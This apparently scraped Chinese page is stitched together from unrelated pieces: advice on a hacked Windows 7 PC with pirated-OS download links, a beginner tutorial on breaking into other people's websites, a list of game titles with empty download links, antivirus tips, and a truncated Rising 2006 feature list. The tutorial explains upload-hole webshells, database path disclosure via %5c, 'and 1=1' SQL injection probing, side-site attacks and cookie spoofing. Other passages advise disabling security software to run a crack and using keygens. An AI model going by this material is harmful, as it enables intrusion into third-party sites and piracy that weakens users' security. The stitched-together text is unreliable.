黑客 微软_微软e3黑客入侵

windows 7h电脑被黑客锁住了怎么办

你这是被黑客入侵了  光找密码没用  下次还会被锁  必须删掉恶意软件才行

建议你找台好电脑做个U盘启动重新对硬盘分区(用于排除不知道在哪病毒木马恶意插件及磁盘故障带来的问题) 

然后点击“工具 - 清除扇区数据”菜单项  点击“硬盘 - 清除保留扇区”菜单项  最后记得保存一下设置   再重装系统

不过建议你在PE里提前备份一下重要的文件资料  ，如：照片、资料、存档数据

系统压缩包通用解压密码：devip（好压解压  采用特殊压缩方案）

Windows

XP迅雷下载地址：

thunder://QUFodHRwOi8vZ2RsLmxpeGlhbi52aXAueHVubGVpLmNvbS8lRTMlODAlOTAlRTglQTclQTMlRTUlOEUlOEIlRTUlQUYlODYlRTclQTAlODElRUYlQkMlOUFkZXZpcCUyMCVFNSU4NiU4NSVFNSU5MCVBQiVFNSVBRSU4OSVFOCVBMyU4NSVFNiU5NSU5OSVFNyVBOCU4QiVFMyU4MCU5MSVFNSVCOCU5RCVFNyU5QiU4QU9TJTIwWFAlRTglQTMlODUlRTYlOUMlQkElRTclODklODgyMDE1JTJFMyUyRTI4JUU2JTlCJUI0JUU2JTk2JUIwJTJFN3o/ZmlkPThqcjBzVUowTFFtNER2NUIrcUJrTHRIbVF2M3FPVzlSQUFBQUFBNllYVENBQi84NXhjalJ6YjNNNkpaa0J2YjYmbWlkPTY2NiZ0aHJlc2hvbGQ9MTUwJnRpZD05Mjc0RTUxMTMwM0QxMkQ4OUI2NzlBOUMzRkFBQkMxMiZzcmNpZD02JnZlcm5vPTEmZz0wRTk4NUQzMDgwMDdGRjM5QzVDOEQxQ0RCRENDRTg5NjY0MDZGNkZBJnVpPXhsa3VhaWNodWFuJnM9MTM2NjI0MzgxOCZwaz1rdWFpY2h1YW4mYWs9ODowOjk5OTowJmU9MTQzODgzODA2MyZtcz01MTIwMCZjaT0mY2s9MEM0QTg5MzREOUFENkNEQTcxRDQyMEU0QjU0ODQ2RUImYXQ9OEY1NDVEM0MxNDJCODAyRTczMUZGMUI2MDkzRjU3QzQmbj0wNjVBM0RFM0M1ODJBM0U1OEUzMjU4RENBQkMyQTA4MUVGMDUyNzE3NDg1MzY5NzAyMDVDM0JGNkM4QjVBQkU1QUUzMDU1RDBBOEMzOTU5OUU3MTEzNjkwQURCNEU1Qjg5RDVFMjZGOTYyNzYyMDU4NTA1MTFFRjZDQkI5QkFFNzg5MzE4RjQzMUMxMDJFMzMyRThCODU5NUI2OTFFNjk2QjA5NzhBMDkyRDI1MDAwMDAwWlo=

【32位】Windows 7迅雷下载地址：

thunder://QUFodHRwOi8vZ2RsLmxpeGlhbi52aXAueHVubGVpLmNvbS8lRTMlODAlOTAzMiVFNCVCRCU4RCVFMyU4MCU5MSVFMyU4MCU5MCVFOCVBNyVBMyVFNSU4RSU4QiVFNSVBRiU4NiVFNyVBMCU4MSVFRiVCQyU5QWRldmlwJTIwJUU1JTg2JTg1JUU1JTkwJUFCJUU1JUFFJTg5JUU4JUEzJTg1JUU2JTk1JTk5JUU3JUE4JThCJUUzJTgwJTkxJUU1JUI4JTlEJUU3JTlCJThBJUU3JUE3JTkxJUU2JThBJTgwV2luJTIwNyUyMFNQMSVFOCVBMyU4NSVFNiU5QyVCQSVFNyU4OSU4OCUyMCUyMDIwMTUlMkUzJTJFMjglRTYlOUIlQjQlRTYlOTYlQjAlMkU3ej9maWQ9d2pLUkxlZ2RjMzF5QlNIWXlYdGhrVXEzQkZ1SzNZQ3pBQUFBQUlMRHd6d0hyTlVPSmVvdkJOV0lWeXJlMzAxMyZtaWQ9NjY2JnRocmVzaG9sZD0xNTAmdGlkPTE1OEQ1RjA1QzZCQzM3Njg5OEE2OTU2NzI2MUM5M0E2JnNyY2lkPTYmdmVybm89MSZnPTgyQzNDMzNDMDdBQ0Q1MEUyNUVBMkYwNEQ1ODg1NzJBREVERjRENzcmdWk9eGxrdWFpY2h1YW4mcz0zMDExNTY2OTg2JnBrPWt1YWljaHVhbiZhaz04OjA6OTk5OjAmZT0xNDM4ODM4MDYzJm1zPTUxMjAwJmNpPSZjaz0wQzRBODkzNEQ5QUQ2Q0RBNzFENDIwRTRCNTQ4NDZFQiZhdD02MUVFRkUyMUZDMjA5NDJBMDFBQzE3QjZGRjZGM0NFOSZuPTBDODY0MDAyRTI3MzlCQjk4RDg2NDAwMzMyQzFFRkVDQTdDNjI1MUM1QUE0RDA4MkU3QzU0MTdENkREQjFCNjE3NjBDQjBCMjM0QzdGQUUxOTBDRTI1M0M1OEE5REM4MUU2RjA1OTc1NzlDQTlDODQ5MTgwNzgwRjM2REFGNUUzQTdGNDI2MTg1MTE2MTY2QTIwNTJFMEMxODE3MDk3QTc4NTgzNUMyODM2QzhGNzI0MjA1N0YwQTNFNDZGNEMyQTMyNUQyNjA5NjVBN0U5QjQyRTUyQkE5MkQxNDE3RjA0MDBaWg==

【64位】Windows 7迅雷下载地址：

thunder://QUFodHRwOi8vZ2RsLmxpeGlhbi52aXAueHVubGVpLmNvbS8lRTMlODAlOTA2NCVFNCVCRCU4RCVFMyU4MCU5MSVFMyU4MCU5MCVFOCVBNyVBMyVFNSU4RSU4QiVFNSVBRiU4NiVFNyVBMCU4MSVFRiVCQyU5QWRldmlwJTIwJUU1JTg2JTg1JUU1JTkwJUFCJUU1JUFFJTg5JUU4JUEzJTg1JUU2JTk1JTk5JUU3JUE4JThCJUUzJTgwJTkxJUU1JUI4JTlEJUU3JTlCJThBJUU3JUE3JTkxJUU2JThBJTgwV2luJTIwNyUyMFNQMSVFOCVBMyU4NSVFNiU5QyVCQSVFNyU4OSU4OCUyMCUyMDIwMTUlMkUzJTJFMjglRTYlOUIlQjQlRTYlOTYlQjAlMkU3ej9maWQ9Q1RLTEVEYncvMmVzaFFQazVGK0JhM0hxZGpMS0I5anBBQUFBQU1sTExFcWcxeW1YNFV4ZGVBZEU2V1FkYi9VZSZtaWQ9NjY2JnRocmVzaG9sZD0xNTAmdGlkPTZEMEIwODcyRTE0NzhCMzI2ODNEOEREOTg5NkMwRjI0JnNyY2lkPTYmdmVybm89MSZnPUM5NEIyQzRBQTBENzI5OTdFMTRDNUQ3ODA3NDRFOTY0MUQ2RkY1MUUmdWk9eGxrdWFpY2h1YW4mcz0zOTIzMjQ5MDk4JnBrPWt1YWljaHVhbiZhaz04OjA6OTk5OjAmZT0xNDM4ODM4MDYzJm1zPTUxMjAwJmNpPSZjaz0wQzRBODkzNEQ5QUQ2Q0RBNzFENDIwRTRCNTQ4NDZFQiZhdD1BQjJBMTAwMDkzMDQ3MjZGNTAwRjI5NTkxOEZGODI2NyZuPTAwMzhBNUVGNjYzNEU0QkQ4RDM4QTVFRUIzODA5MEU4QTc3OEMwRjFEQkU1QUY4NkU3N0JBNDkwRUM5QTY0NjU3NkIyNTU1RkI1ODY4NUU1OTA3MEMwRDFEOUU4QTM4NUU2NEVCQzk4Rjg4QkUzODA5MTNFOURFMkI3OUI4QUU3QTc0QUMzRjVEMDU3Njk2RTIwRUMwNTJDMDAzMUU4QTM4NTNEQjlDNUI3ODk4ODIwMjBFOTE1NEU2NTJFMzMyRTMyRTNDM0U0RTRFNjk2QjAyRUVDNUY3RjUwMDAwMDAwMDBaWg==

预装WIN8/8.1系统的品牌机安装WIN7 64位系统   因为电脑启动激活机制不同可能无法自动激活 

安装完系统进入系统后使用桌面的小马激活进行和谐  请关闭安全软件进行和谐  毕竟是修改系统核心达到和谐的目的的

如果你觉得本篇经验对你有帮助，请【采纳】选择【满意答案】并且投上宝贵的一票，谢谢!

别人的网站黑客是怎么入侵的呢？

首先介绍下什么样的站点可以入侵：必须是动态的网站

比如

asp

php

jsp

这种形式的站点

后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0）

入侵介绍：

1。上传漏洞

2。暴库

3。注入

4。旁注

5。COOKIE诈骗

1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。

怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示

上传格式不正确[重新上传]

这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL

工具介绍：上传工具

老兵的上传工具

DOMAIN3.5

这两个软件都可以达到上传的目的

用NC也可以提交

WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主内容等权限，但是并没有什么特别高的权限，（这个看管理员的设置了）一般修改别人主大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马

海阳2006也是

WEB木马）我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到更高权限。

2。暴库：这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。

暴库 *** ：比如一个站的地址为

;ID=161

我门就可以把com/dispbbs中间的/换成%5c

如果有漏洞直接得到数据库的绝对路径

用寻雷什么的下载下来就可以了

还有种 *** 就是利用默认的数据库路径

后面加上

conn.asp

如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c）

为什么换成%5c：因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了？

这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的？我该怎么办？这里可以在下载时把。ASP换成。MDB

这样就可以下载了如果还下载不了可能作了防下载。

3。注入漏洞：这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。

怎样利用：我先介绍下怎样找漏洞比如这个网址

;ID=161

后面是以ID=数字形式结尾的站我们可以手动在后面加上个

and

1=1

看看

如果显示正常面

再加上个and

1=2

来看看

如果返回正常面说明没有漏洞

如果返回错误面说明存在注入漏洞。如果加and

1=1

返回错误面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了

可以手工来猜解也可以用工具现在工具比较多（NBSI

NDSI

啊D

DOMAIN等）都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。

4。旁注：我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等 *** 来入侵我们要入侵的站点。打个形象的比喻，

比如你和我一个楼

我家很安全,而你家呢

却漏洞百出

现在有个贼想入侵我家

他对我家做了监视(也就是扫描)发现没有什么可以利用的东西

那么这个贼发现你家和我家一个楼

你家很容易就进去了

他可以先进入你家

然后通过你家得到整个楼的钥匙(系统权限)

这样就自然得到我的钥匙了

就可以进入我的家(网站)

工具介绍：还是名小子的DOMIAN3.5不错的东西

，可以检测注入

可以旁注

还可以上传！

5.COOKIE诈骗：许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。

怎样诈骗呢？如果我们现在已经知道了XX站管理员的站号和MD5密码了

但是破解

不出来密码

（MD5是加密后的一个16位的密码）我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE

这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。

今天的介绍就到这里了

比较基础，都是概念性的东西，所有的都是我的个人理解，如有不正确的地方希望大家指出（个人认为就是

为什么换成%5c

这里有点问题）。

单机游戏

一千多个大小游戏直接http下载,不打开任何网页

魔兽争霸3:冰封王座(Warcraft III) 下载地址：

冒险岛 下载地址：

暴力机车(Jacked) 下载地址：

冲突:越南(Conflict:Vietnam) 下载地址：

三角洲特种部队:黑鹰坠落 下载地址：

百战天虫3D(Worms 3D) 下载地址：

世界摩托大奖赛2006(MotoGP2006) 下载地址：

雷神之锤4(Quake4) 下载地址：

领土战争:入侵纽约(TerraWars:New York Invasion) 下载地址：

猎杀潜航2 下载地址：

文明城市：罗马(CivCity:Rome) 下载地址：

红色警戒2尤里的复仇 下载地址：

大唐豪侠 下载地址：

重返狼穴3：悍马攻击(Humvee Assault) 下载地址：

极品醉车(Juiced) 下载地址：

英雄萨姆(Serious Sam) 下载地址：

奇迹MU 下载地址：

职业足球经理2006(Professional Manager 2006) 下载地址：

碧雪情天 下载地址：

帝国时代2(Age of Empires II) 下载地址：

彩虹骑士 下载地址：

科林麦考雷拉力4(Colin McRae Rally 4) 下载地址：

侠盗猎车:罪恶都市(Grand Theft Aut Vice City) 下载地址：

特洛伊战争(Battle for Troy) 下载地址：

重返狼穴2:血战太平洋(Deadly Dozen 2:Pacific Theater) 下载地址：

绵羊传奇(Sheep) 下载地址：

射鸡英雄传2(Chicken Shoot 2) 下载地址：

犯罪现场调查：谋杀的三维(CSI 3 Dimensions of Murder) 下载地址：

冬季运动专业版2006(Winter Challenge) 下载地址：

街头赛车联盟(SRS Street Racing Syndicate) 下载地址：

反恐精英(CS) 下载地址：

机器人历险记(Robots) 下载地址：

魔法飞球2 下载地址：

三角洲特种部队2 (Delta Force 2) 下载地址：

疯狂熊猫足球(Crazy of Kicker) 下载地址：

Game淘 下载地址：

侠盗猎魔(Manhunt) 下载地址：

霍伊尔纸牌游戏2007(Hoyle Card Games 2007) 下载地址：

猎人MM 下载地址：

半条命(Half-life) 下载地址：

欢乐奇兵 下载地址：

真封神 下载地址：

反恐精英(CS) 下载地址：

虚拟人生2 下载地址：

变异风暴(Mutant Storm) 下载地址：

将军娃娃 下载地址：

摩托英豪(Moto Racer) 下载地址：

街头篮球 下载地址：

极品摩托2(Moto GP II) 下载地址：

格兰匹治大赛4(Grand Prix 4) 下载地址：

FIFA 下载地址：

梅赛德斯奔驰卡车赛(Mercedes-Benz Truck Racing) 下载地址：

盟军敢死队 下载地址：

极品摩托(MOTO GP) 下载地址：

梦幻群侠传之龙在天涯 下载地址：

星际家园 下载地址：

极品飞车(Need For Speed) 下载地址：

玩具兵大战(Army Men:RTS) 下载地址：

救火先锋(Wildfire) 下载地址：

三国志9 下载地址：

命运II 下载地址：

合金弹头 下载地址：

星球大战:星际战士(Star Wars:Starfighter) 下载地址：

FIFA 下载地址：

桌球俱乐部(CueClub) 下载地址：

地球文明 下载地址：

哈利波特2:消失的密室(Harry Potter And The Chamber Of Secrets) 下载地址：

欧战之翼:冷战升温(Wings Over Europe - Cold War Gone Hot) 下载地址：

主题医院(Theme Hospital) 下载地址：

NBA Live 下载地址：

极品飞车(Need For Speed) 下载地址：

疯狂赛车 下载地址：

百战天虫4:伤害(Worms 4: Mayhem) 下载地址：

新倚天 下载地址：

龙人德里克传奇(Drake of the 99 Dragons) 下载地址：

盛大富翁 下载地址：

装载卡车竞赛2(Rig Racer 2) 下载地址：

多浪迪警官(Torrente) 下载地址：

美女卡丁车(Action Girlz Racing) 下载地址：

极品飞车(Need For Speed) 下载地址：

乱武天下 下载地址：

跑跑卡丁车 下载地址：

要塞(Stronghold) 下载地址：

三国群英传2 下载地址：

雷曼竞技场(Rayman M) 下载地址：

星际争霸(Starcraft) 下载地址：

足球经理(Football Manager) 2006 下载地址：

整蛊邻居(Neighbours From Hell) 下载地址：

极品飞车2(Need For Speed II) 下载地址：

上帝也疯狂3(Popvlovs:The Beginning) 下载地址：

汽车总动员(Cars-PLEX) 下载地址：

大富翁 下载地址：

IGS经典游戏大合集 下载地址：

雷神之锤2(QUAKE2) 下载地址：

格兰匹治传奇(Grand Prix Legends) 下载地址：

都市极限飚车(Urban Extreme) 下载地址：

圣斗士星矢 下载地址：

饿狼传说(Mark of the Wolves) 下载地址：

爱心宠物猫(Kitty Luv) 下载地址：

珍珠港 下载地址：

壮志凌云(Jets n Guns) 下载地址：

3D魂斗罗 下载地址：

抢滩登陆战 下载地址：

阿帕奇杀戮战场 下载地址：

雷电超激版(Ultra Assault) 下载地址：

生化危机2(Resident Evil 2) 下载地址：

星际狂人(Star Fury) 下载地址：

龙虎门Online 下载地址：

热血躲避球2 下载地址：

梦幻麻将馆 下载地址：

祖鲁宝石(Zulu Gems) 下载地址：

玩具军人3(Army Men 3) 下载地址：

三国战纪2代(群雄争霸) 下载地址：

山谷冒险(Out from Boneville) 下载地址：

中国游戏中心 下载地址：

MAME32K 下载地址：

边城英烈传(The Alamo) 下载地址：

墨西哥飞车帮(Mexican Motor Mafia) 下载地址：

游戏大亨(Game Tycoon) 下载地址：

警探派克(BeTrapped) 下载地址：

F16战斗机(F-16 Multirole Fighter) 下载地址：

百战天虫之泡泡虫(Worms Blast) 下载地址：

虚拟船长2(Virtual Skipper 2) 下载地址：

黄金岛 下载地址：

彩京1945 下载地址：

恋爱物语(Eberouge) 下载地址：

玩具军人2(Army Men 2) 下载地址：

疯狂水果机(Fruit Machine Mania) 下载地址：

梦幻战争 下载地址：

梦想网球比赛(Dream Match Tennis) 下载地址：

围棋助手 下载地址：

旋转城堡俄罗斯(Tower of the Ancients) 下载地址：

F22战斗机 下载地址：

平衡球(Ballance) 下载地址：

摩托车场地障碍赛(Trials Construction Yard) 下载地址：

飘羽失忆天使 下载地址：

超级坦克大战(Tank-O-Box) 下载地址：

拳皇(The King of Fighters) 下载地址：

肯尼海底大冒险(Scuba in Aruba) 下载地址：

孤单 *** +双资料篇(Alien Shooter+Fight For Life+The Experiment) 下载地址：

咻咻大作战 下载地址：

美女沙滩排球(Beach Volley Hot Sports) 下载地址：

M1坦克排2(M1 Tank Platoon II) 下载地址：

跳跳小狐狸(Foxy Jumper) 下载地址：

疯狂机器3之新实验(Crazy Machines-News out of the laboratory) 下载地址：

连锁反应汉化版(Chain Reaction) 下载地址：

肥猪运动会(Fette Sau) 下载地址：

飞龙武士(ExZeus) 下载地址：

遥控赛车(Revolt) 下载地址：

帝国时代(Age of Empires) 下载地址：

怪鸡西部 *** (Moorhuhn Wanted XXL) 下载地址：

黑暗史诗(Fate) 下载地址：

雨球魔法(Balloon Rain) 下载地址：

虎克船长(Captain Claw) 下载地址：

银河勇士(Protothea) 下载地址：

激光兔2(Jazz Jackrabbit 2) 下载地址：

卡通叛乱(Balls of Steel) 下载地址：

怪鸡飞碟入侵(Moorhuhn Invasion) 下载地址：

拳皇(The King of Fighters) 下载地址：

锤锤Online 下载地址：

反恐炸弹人 下载地址：

拳皇(The King of Fighters) 下载地址：

半条命横版过关(Codename Gordon) 下载地址：

三国战纪 下载地址：

*** 堂 下载地址：

爱心宠物狗(Puppy Luv:A New Breed) 下载地址：

爆弹小子2(Bomberic 2) 下载地址：

疯狂能量盘(Crazy Power Disc) 下载地址：

疯狂坦克2 下载地址：

云-中文版(Cloud) 下载地址：

豪血寺一族(Power Instinct)4 下载地址：

拳皇(The King of Fighters) 下载地址：

神佑擂台(Ehrgeiz) 下载地址：

饿狼传说2(Real Bout Fatal Fury 2 - The Newcomers) 下载地址：

太平洋英雄(WW2 Pacific Heroes) 下载地址：

疯狂机器(Crazy Machines) 下载地址：

超真实弹珠台(Super Pool) 下载地址：

疯狂机器2之新挑战(Crazy Machines New Challenges) 下载地址：

蛋蛋保卫战(Feelers) 下载地址：

街头网球(Street Status) 下载地址：

学徒电视秀(The Apprentice) 下载地址：

骑士飞行棋2(Don’t Get Angry 2) 下载地址：

超级特技赛车(Super Stunt Spectacular) 下载地址：

月华剑士2(The Last Blade 2) 下载地址：

死亡狩猎(Deadhunt) 下载地址：

突围奇兵2(Shock Troopers 2) 下载地址：

星际高尔夫(Golf Adventure Galaxy) 下载地址：

银河忍者(Fighting Layer) 下载地址：

立体街霸2(Street Fighter EX Plus 2) 下载地址：

恐龙猎人3(Turok 3:Shadow of Oblivion) 下载地址：

恐龙佣兵(Primal Rage) 下载地址：

弗朗肯博士(Dr Franken) 下载地址：

保龄球(Gutterball) 下载地址：

彩京打击者1945加强版(Strikers 1945 Plus) 下载地址：

冰河(Glacier Racing) 下载地址：

原始岛2(Prehistoric Isle 2) 下载地址：

武装飞鸟2(Gunbird 2) 下载地址：

拳皇(The King of Fighters) 下载地址：

007:黑日危机(007:The World Is Not Enough) 下载地址：

堕落天使(Daraku Tenshi) 下载地址：

阿克斯竞技场(Axis Arean) 下载地址：

马里奥聚会3(Mario Party 3) 下载地址：

满月无双剑 下载地址：

孤单 *** 之英雄回归(Theseus return of the hero) 下载地址：

焦土战争(Scorched 3D) 下载地址：

海底指挥官(Ocean Commander) 下载地址：

国殇之血色狼烟 下载地址：

罪与罚 下载地址：

泡泡堂 下载地址：

合金弹头(METAL SLUG)X 下载地址：

潜艇小英雄(Sub Culture) 下载地址：

卡泼卫勒格斗2(Capoeira Fighter 2) 下载地址：

真人快打3(Mortal Kombat 3) 下载地址：

蒸汽旅(Steam Brigade) 下载地址：

仙剑奇侠传 下载地址：

魔域幽灵(Vampire Savior 2:The Lord of Vampire) 下载地址：

梦幻西餐厅2 下载地址：

魔法之争(Magic Match) 下载地址：

怪怪水族箱 下载地址：

龙珠Z(Dragon Ball Z) 下载地址：

火星任务-超固体射击(Mars Matrix:Hyper Solid Shooting) 下载地址：

国际板球2006(International Cricket Captain 2006) 下载地址：

玩具总动员2(Toy story 2) 下载地址：

神凰拳(Operation Ragnagard) 下载地址：

月华的剑士一代(The Last Blade) 下载地址：

无尽浩劫(After the End) 下载地址：

征战者(Gaia Crusaders) 下载地址：

魔法门之英雄无敌2(Heroes of Might and Magic 2) 下载地址：

格斗摔角(Wrestling Encore) 下载地址：

超级世界棒球(super world stadium)99 下载地址：

饿狼传说特别版(Real Bout Fatal Fury Special) 下载地址：

Re-Volt 下载地址：

Jam XM 下载地址：

魂之利刃(Soul Edge) 下载地址：

梦工厂-闪亮之星(Blazing Star) 下载地址：

神秘视线(Mystery Case Files - Huntsville) 下载地址：

甲虫轮盘(Scarabeus - Marbles of the Pharaoh) 下载地址：

星际弹球之失落的世界(Rebound Lost Worlds) 下载地址：

敏捷世界2(Urbagility 2) 下载地址：

决战时空要塞G(G-Darius) 下载地址：

复仇格斗兔(Lugaru) 下载地址：

美味餐厅(Delicious Deluxe) 下载地址：

自行飞翔车(Prop Cycle) 下载地址：

大家来找碴 下载地址：

魔法客栈(Mystic Inn) 下载地址：

疯狂火箭(Rocket Mania Deluxe) 下载地址：

NBA篮球_悬空瞬间(NBA Hangtime) 下载地址：

拳皇(The King of Fighters) 下载地址：

暗影之刃(Obscura-The Shadow Blade) 下载地址：

废弃星球(Trash) 下载地址：

龙之光辉(Dragon Blaze) 下载地址：

森林网球(Tennis Titans) 下载地址：

突击骑兵(Shock Troopers) 下载地址：

少年街霸(Street Fighter Alpha) 下载地址：

战斗翔鹰(Battle Bakraid) 下载地址：

地下捉鬼队(HollenJob) 下载地址：

超时空要塞(Macross Plus) 下载地址：

极限滑板(Cool Boarders Arcade Jam) 下载地址：

北极探索(Arctic Quest) 下载地址：

极限狂飚(Race Cars The Extreme Rally) 下载地址：

桌上模型车赛(Mini Desktop Racing) 下载地址：

山脊赛车(Road Rash 64) 下载地址：

攻击性计算机病毒入侵的途径与防治中技术路线有哪些？

我用的是诺顿反病毒+AVAST+ZONE ALARM防火墙

值得注意的是诺顿反病毒2006+AVAST PRO 4.7反病毒这两者并不冲突,诺顿霸道而AVAST比较含蓄,2者结合杀毒效果很好,这主要体现在诺顿的全盘杀毒扫描和AVAST的实时监控上.

然后2者在配ZONE ALARM防火墙就会很安全了

杀毒和防火墙更好不要用一个牌子的

你的机器如果可能的话可以再装金山毒霸2007,你把金山的实时监控和自动启动关闭就不会和诺顿冲突,你可以把金山当作专门负责下载文件的扫描的杀毒工具.

以上4套软件除了不能让金山随机启动外,别的可以,这样AVAST防毒.诺顿杀毒.ZONE ALARM反木马.金山查下载的文件.你的机器会很安全的...我的就是这样作的,我的配置是CPU AMD 3000+ 内存 512 我的机器现在的速度也很快

相关软件网上可以下载的很多,你自己试试吧(更好到官方网站下载原版然后再找到注册机,我就是这样作的) 非官方网站的杀毒工具可能已经改动,并且内含病毒木马,切记!!

瑞星2006杀毒软件简介

1.2 应用环境及语言支持

软件环境

Windows操作系统：Windows 95/98/Me或Windows NT4.0/2000/XP/2003。

硬件环境

CPU：PIII 500 MHz 以上

内存：64 MB以上

显卡：标准VGA，24位真彩色

其它：光驱、鼠标

语言支持

瑞星杀毒软件支持简体中文、繁体中文、英文和日文四种语言，其中英文可以在所有语言 Windows 平台上使用。瑞星杀毒软件将来还会支持更多种类的语言。

1.3 主要特性与功能

1.3.1 第七代极速引擎，查杀毒速度提升30%。

瑞星杀毒软件2006版采用第七代极速杀毒引擎。该引擎在2005版的基础上进行了改进，增加了对7-ZIP压缩格式以及多种壳的扫描，使查杀病毒更为细致、准确。

第七代极速引擎对性能做了进一步优化。与2005版相比，查毒速度提升30%，扫描相同的文件量可以大幅度节省用户的时间。

1.3.2 内嵌“木马墙”技术，彻底解决账号、密码丢失问题

传统的隐私保护、密码保护都要求用户事先输入自己的账号、密码等信息，以防止木马对外发送密码。此类隐私保护只能防止发送密码明文的木马，如果密码信息稍加变形或加密就会使此种保护方式失效。

瑞星个人防火墙2006版内嵌“木马墙”技术，通过使用反挂钩、反消息拦截以及反进程注入等方式，直接阻断木马、间谍软件、恶意程序等对用户隐私信息的获取，从根本上解决盗号等问题。

1.3.3 未知病毒查杀（已获国家专利，专利号：ZL 01 1 17726.8）

瑞星杀毒软件2006版采用“未知病毒查杀”专利技术，不仅可查杀 DOS 、邮件、脚本以及宏病毒等未知病毒，还可自动查杀 Windows 未知病毒，在国际上率先使杀毒软件走在了病毒前面。

1.3.4 在线专家门诊

首创在线互动式服务模式，可实现远程诊断、远程维护、实时交流的全新互联网服务。

1.3.5 卡卡上网安全助手

整合智能广告拦截、系统一键修复、IE外观修复、IE反劫持、解除非法限制、启动项管理、插件免疫、插件管理、系统清理、IE地址清理、痕迹清理、 *** 钓鱼网站过滤、病毒网站过滤、浏览器劫持网站过滤、恶意脚本网站过滤等诸多功能，为用户营造一个更安全、洁净的上网环境。

1.3.6 八大监控系统

瑞星杀毒软件2006版提供了“文件、注册表、内存、网页、邮件发送、邮件接收、漏洞攻击、引导区”八大监控系统，给计算机提供完整全面的保护。八大监控系统不仅能够轻松查杀现阶段所出现的所有已知病毒，更能对未知的病毒、木马、间谍软件进行预先防范。

1.3.7 可疑文件定位

很多病毒、木马、间谍软件及恶意程序都会将自身添加到计算机的启动项目中以实现打开计算机自动运行的目的。瑞星个人防火墙2006版可以列出注册表、ini文件、系统服务和开始菜单等启动项里面的所有随机启动项目，并可以对相关启动项目进行禁用和删除等操作。

瑞星个人防火墙2006版还可以列出系统正在运行的所有进程、模块名以及属性信息，并可结束或挂起某一进程。

该功能自动将可疑项目标注为红色，使病毒无以遁形。

1.3.8 主动漏洞扫描、修补

瑞星杀毒软件2006版可自动扫描用户计算机上存在的漏洞、不安全设置，对用户计算机的安全状况进行评估。同时，它可以根据评估结果修补用户计算机上存在的安全漏洞并给出合理化建议。

通常，安装多个安全补丁程序时，如果其中某一补丁需要重新启动计算机，则启动计算机后，它后面的补丁不会自动继续安装。瑞星杀毒软件2006版的连续打补丁功能可以解决这个问题，重新启动计算机后仍能继续安装没有安装的补丁程序。

1.3.9 IP攻击追踪

当遇到黑客入侵时，不但可以拦截攻击数据包取得黑客的IP地址信息，还可以根据获取的IP地址找到黑客的物理所在位置。“IP攻击追踪”功能极大方便了用户对黑客攻击的取证，使得用户在面对黑客攻击时由“被动挨打”变为“主动出击”。

1.3.10 *** 游戏帐号保护功能

根据国内的实际应用情况，瑞星独创 *** 游戏帐号保护功能，可自动识别流行的 *** 游戏并进行安全防护。同时，灵活的扩展性允许用户自定义要保护的帐号和安全策略。

1.3.11 *** 可信区域设置

瑞星个人防火墙2006版通过对可信区域进行设置，可以在同一台计算机上设置不同的安全策略。软件可以自动识别出计算机访问的是局域网还是互联网，并采用与之对应的安全策略。

1.3.12 全自动无缝升级

上网用户再也不必为软件升级操心，瑞星杀毒软件2006版的主动式智能升级技术会自动检测最新的版本并自动为您升级。

瑞星杀毒软件2006版采用国内独家的无缝安全升级技术，可以实现在查杀病毒的同时进行升级操作且无需关闭监控程序。

通过与瑞星个人防火墙2006版联动，可以保证在升级过程中不受诸如冲击波、震荡波、Zotob蠕虫病毒、木马、间谍软件及黑客等的侵袭。

1.3.13 家长保护

自动屏蔽常见的不适合青少年浏览的色情、反动网站，给孩子创建一个绿色健康的上网环境。

1.3.14 迷你杀毒

许多用户希望杀毒时不影响自己的工作，而传统的杀毒软件检查病毒通常需要较长的时间，且会明显减慢计算机的运行速度。瑞星杀毒软件2006版针对此问题提供了迷你杀毒功能，它只占用极小的系统资源。用户可以在查杀病毒过程中进行其他的工作，而不会感到速度有所减慢。

1.3.15 数据修复（已获国家专利，专利号：ZL 01 1 17730.6）

瑞星杀毒软件2006版在原有的“超容压缩数据保护技术”的基础上进行了重新设计、改进，占用硬盘空间更少，效率更高。该功能将备份数据保存在硬盘中，当用户数据丢失时，可以极大限度地进行修复。

1.3.16 抢先启动杀毒

瑞星杀毒软件2006版不仅可在Windows的登录界面下（即系统还未完全启动时）开启实时监控进行防毒，还可以直接启动杀毒软件进行杀毒。通过此功能可以有效查杀一些顽固病毒、木马。

1.3.17 垃圾邮件双重过滤引擎

采用贝叶斯算法、黑白名单双重垃圾邮件过滤引擎，大大提高了对垃圾邮件的识别率。用户无需进行特别设置，该引擎会在邮件的主题中自动标注该邮件是垃圾邮件，可支持Outlook、Outlook Express、Foxmail 等多种邮件客户端程序。

1.3.18快捷方式杀毒

用户可以轻松自定义常用的硬盘分区和文件，选择需要的处理方式，创建相应的快捷方式。用户以后只需直接点击该快捷方式，即可快速杀毒。

1.3.19 光盘启动应急杀毒

